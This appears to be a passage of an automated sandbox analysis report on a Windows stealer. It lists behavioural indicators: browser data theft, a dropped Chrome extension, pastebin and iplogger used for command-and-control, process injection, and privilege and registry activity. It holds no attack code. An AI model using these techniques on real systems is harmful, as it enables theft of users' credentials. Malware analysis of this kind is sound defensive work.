N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1256 set thread context of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768607450469010" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2368 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2368 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2368 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3320 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe
PID 3320 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe
PID 3320 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe
PID 3476 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
